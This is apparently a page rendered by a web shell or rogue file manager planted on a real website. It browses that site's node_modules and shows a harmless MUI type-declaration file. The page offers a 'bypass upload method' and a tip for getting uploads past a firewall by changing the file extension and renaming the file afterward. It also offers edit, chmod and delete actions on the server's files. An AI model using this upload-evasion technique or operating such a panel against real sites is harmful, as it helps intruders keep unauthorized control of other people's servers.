Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
var
www
candid-dev-nxt.wpress.dk
httpdocs
node_modules
@mui
utils
createChainedFunction
File Content:
createChainedFunction.d.ts
/** * Safe chained function. * * Will only create a new function if needed, * otherwise will pass back existing functions or null. */ export default function createChainedFunction<Args extends any[], This>(...funcs: Array<(this: This, ...args: Args) => any>): (this: This, ...args: Args) => void;
Edit
Download
Unzip
Chmod
Delete